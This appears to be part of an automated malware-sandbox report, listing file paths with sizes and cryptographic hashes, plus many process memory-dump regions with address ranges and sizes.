                                                                                                                                                                                                    1ee8f058888566de059adf051dfda5d9468fa5b90219aff996e151759184cfefd0f91261fdf70aa8deb9359555e163da35402f058daf35093a6867256090abd2

                                                                                                                                                                                                  • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    2KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    5ce3e53600f2783e196444545a1f216d

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    2e28ffeec72856576448b85c04a3925d0872c87e

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    d8cd932ef3436f38c6d63c4670b6d3d34b7ffff76ba5d7eeeed4c84ce77025b3

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    9f5ff276586347276fe1b5e03f4e689426ffdf554a56b9c9d8190160d45580cba2c164eb9a09fbc42fd2844fe17780b8d03b64774e45ad0c5d0e198e934dea4e

                                                                                                                                                                                                  • C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    2KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    0f83a5c85488489ec8bbd93f8908c36a

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    44f425b2beb19614a8e78fd77e779d152ac0fba1

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    faa19aa4ce6bfa71c886d9fc794edd74af47381a6a2774c4972274998310a3f9

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    7068947bc6c026cb5e3a4d4eb2e0564503ff49b339cb0af4a4595d924670758589cce565011c64f5ba9fc83bd8d863e7ac9020a7fb39c6586f44fc104c1fdd35

                                                                                                                                                                                                  • C:\Windows\system32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\Certificates\DA31673C72A0B94D6328F67867407D67EF4ADE6B

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1KB

                                                                                                                                                                                                    MD5

                                                                                                                                                                                                    b54a2a77a305eaae92bca813c3748c78

                                                                                                                                                                                                    SHA1

                                                                                                                                                                                                    a8ad1620bd499c779f688118112a53985dbea627

                                                                                                                                                                                                    SHA256

                                                                                                                                                                                                    22fd8a45637bf477f7f8854fd679d30c04fd117159164d617955ed8ae869b58b

                                                                                                                                                                                                    SHA512

                                                                                                                                                                                                    ccd37c84ebc1b375277f69e3315224a0ecbc9d7e6812878b286b6afa91d1bfa90d60070c04e08311064f10f5ce5be67e5705c621ee6916a45d4c860bd7ba3b7b

                                                                                                                                                                                                  • memory/1484-24-0x00000000084C0000-0x0000000008A64000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    5.6MB

                                                                                                                                                                                                  • memory/1484-20-0x0000000006480000-0x000000000649A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    104KB

                                                                                                                                                                                                  • memory/1484-23-0x0000000007440000-0x0000000007462000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    136KB

                                                                                                                                                                                                  • memory/1484-18-0x0000000006010000-0x000000000605C000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    304KB

                                                                                                                                                                                                  • memory/1484-19-0x0000000007890000-0x0000000007F0A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    6.5MB

                                                                                                                                                                                                  • memory/1484-22-0x00000000074B0000-0x0000000007546000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    600KB

                                                                                                                                                                                                  • memory/1484-16-0x0000000005A00000-0x0000000005D54000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    3.3MB

                                                                                                                                                                                                  • memory/1484-2-0x0000000004A30000-0x0000000004A66000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    216KB

                                                                                                                                                                                                  • memory/1484-5-0x0000000005920000-0x0000000005986000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    408KB

                                                                                                                                                                                                  • memory/1484-17-0x0000000005FF0000-0x000000000600E000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    120KB

                                                                                                                                                                                                  • memory/1484-6-0x0000000005990000-0x00000000059F6000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    408KB

                                                                                                                                                                                                  • memory/1484-3815-0x0000000000670000-0x0000000000B23000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                  • memory/1484-4-0x0000000005040000-0x0000000005062000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    136KB

                                                                                                                                                                                                  • memory/1484-3693-0x0000000000670000-0x0000000000B23000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                  • memory/1484-3-0x00000000050C0000-0x00000000056E8000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    6.2MB

                                                                                                                                                                                                  • memory/1768-2885-0x0000000006810000-0x000000000685C000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    304KB

                                                                                                                                                                                                  • memory/1768-2883-0x0000000006110000-0x0000000006464000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    3.3MB

                                                                                                                                                                                                  • memory/1804-7798-0x0000017ED8B40000-0x0000017ED8B4A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    40KB

                                                                                                                                                                                                  • memory/1804-7908-0x0000017ED8C10000-0x0000017ED8C1A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    40KB

                                                                                                                                                                                                  • memory/1804-7788-0x0000017ED8BC0000-0x0000017ED8BDC000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    112KB

                                                                                                                                                                                                  • memory/1804-7792-0x0000017ED8CA0000-0x0000017ED8D55000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    724KB

                                                                                                                                                                                                  • memory/1804-7904-0x0000017ED8C00000-0x0000017ED8C06000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    24KB

                                                                                                                                                                                                  • memory/1804-7818-0x0000017ED8BE0000-0x0000017ED8BFC000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    112KB

                                                                                                                                                                                                  • memory/1804-7879-0x0000017ED8BA0000-0x0000017ED8BAA000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    40KB

                                                                                                                                                                                                  • memory/1804-7895-0x0000017ED8D60000-0x0000017ED8D7A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    104KB

                                                                                                                                                                                                  • memory/1804-7899-0x0000017ED8BB0000-0x0000017ED8BB8000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    32KB

                                                                                                                                                                                                  • memory/2480-8990-0x0000000000220000-0x0000000000682000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.4MB

                                                                                                                                                                                                  • memory/2480-8952-0x0000000000220000-0x0000000000682000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.4MB

                                                                                                                                                                                                  • memory/2480-8991-0x0000000000220000-0x0000000000682000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.4MB

                                                                                                                                                                                                  • memory/2480-10333-0x0000000000220000-0x0000000000682000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.4MB

                                                                                                                                                                                                  • memory/2480-10383-0x0000000000220000-0x0000000000682000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.4MB

                                                                                                                                                                                                  • memory/2508-89-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-67-0x000001C6CA220000-0x000001C6CA32A000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-91-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-85-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-93-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-2887-0x000001C6CA530000-0x000001C6CA584000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    336KB

                                                                                                                                                                                                  • memory/2508-97-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-101-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-103-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-107-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-109-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-2872-0x000001C6CA380000-0x000001C6CA3D6000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    344KB

                                                                                                                                                                                                  • memory/2508-113-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-84-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-2873-0x000001C6CA3E0000-0x000001C6CA42C000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    304KB

                                                                                                                                                                                                  • memory/2508-68-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-117-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-119-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-121-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-125-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-81-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-127-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-79-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-105-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-129-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-69-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-111-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-115-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-71-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-99-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-95-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-87-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-66-0x000001C6AFD80000-0x000001C6AFE28000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    672KB

                                                                                                                                                                                                  • memory/2508-123-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-77-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-73-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2508-75-0x000001C6CA220000-0x000001C6CA327000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    1.0MB

                                                                                                                                                                                                  • memory/2832-3946-0x00000000057F0000-0x0000000005B44000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    3.3MB

                                                                                                                                                                                                  • memory/2832-3959-0x0000000005D50000-0x0000000005D9C000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    304KB

                                                                                                                                                                                                  • memory/3336-10722-0x0000000000240000-0x000000000094E000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    7.1MB

                                                                                                                                                                                                  • memory/3336-10760-0x0000000000240000-0x000000000094E000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    7.1MB

                                                                                                                                                                                                  • memory/4204-7603-0x00007FF625780000-0x00007FF625E14000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    6.6MB

                                                                                                                                                                                                  • memory/4204-7559-0x00007FF625780000-0x00007FF625E14000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    6.6MB

                                                                                                                                                                                                  • memory/4232-5184-0x0000000000ED0000-0x000000000136F000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.6MB

                                                                                                                                                                                                  • memory/4232-5410-0x0000000000ED0000-0x000000000136F000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.6MB

                                                                                                                                                                                                  • memory/4608-7053-0x0000000000400000-0x0000000000CDA000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    8.9MB

                                                                                                                                                                                                  • memory/4608-6823-0x0000000000400000-0x0000000000CDA000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    8.9MB

                                                                                                                                                                                                  • memory/4988-4552-0x0000000000A60000-0x0000000000F13000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                  • memory/4988-4647-0x0000000000A60000-0x0000000000F13000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                  • memory/5176-1870-0x0000000000670000-0x0000000000B23000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                  • memory/5176-46-0x0000000000670000-0x0000000000B23000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                  • memory/5500-32-0x0000000000FB0000-0x0000000001463000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                  • memory/5500-48-0x0000000000FB0000-0x0000000001463000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                  • memory/5636-3032-0x0000028AAABE0000-0x0000028AAAC56000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    472KB

                                                                                                                                                                                                  • memory/5636-3028-0x0000028A92490000-0x0000028A924D4000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    272KB

                                                                                                                                                                                                  • memory/6108-2888-0x00000207F1580000-0x00000207F15A2000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    136KB

                                                                                                                                                                                                  • memory/6924-7407-0x0000000000400000-0x0000000000CDA000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    8.9MB

                                                                                                                                                                                                  • memory/6924-7297-0x0000000000400000-0x0000000000CDA000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    8.9MB

                                                                                                                                                                                                  • memory/6940-10886-0x0000000000670000-0x0000000000B23000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                  • memory/6940-10911-0x0000000000670000-0x0000000000B23000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                  • memory/6980-7372-0x0000000000AB0000-0x0000000000F62000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.7MB

                                                                                                                                                                                                  • memory/6980-7311-0x0000000000AB0000-0x0000000000F62000-memory.dmp

                                                                                                                                                                                                    Filesize

                                                                                                                                                                                                    4.7MB